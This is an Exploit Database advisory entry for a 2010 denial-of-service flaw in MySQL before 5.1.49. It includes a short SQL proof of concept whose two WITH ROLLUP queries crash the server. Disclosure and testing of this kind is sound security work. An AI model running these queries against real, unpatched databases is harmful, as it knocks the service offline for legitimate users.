Oracle MySQL < 5.1.49 - 'WITH ROLLUP' Denial of Service

• Exploit Database
• 14 阅读

• 作者： Shane Bester
  日期： 2010-11-09
• 类别：

  • dos
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/15467/

• source: https://www.securityfocus.com/bid/42596/info
  
  MySQL is prone to a denial-of-service vulnerability.
  
  An attacker can exploit this issue to crash the database, denying access to legitimate users.
  
  This issue affects versions prior to MySQL 5.1.49.
  
  NOTE: This issue was previously covered in BID 42586 (Oracle MySQL Prior to 5.1.49 Multiple Denial Of Service Vulnerabilities) but has been assigned its own record to better document it. 
  
  PoC:
  
  drop table if exists `t1`;
  create table `t1`(`a` int)engine=myisam;
  insert into `t1` values (1);
  /*crash1*/select (`a` in (`a`,`a`)) from `t1` group by `a` with rollup;
  /*crash2*/select (case (`a`) when (`a`) then (`a`) end) as `a` from `t1` group by `a`
  with rollup;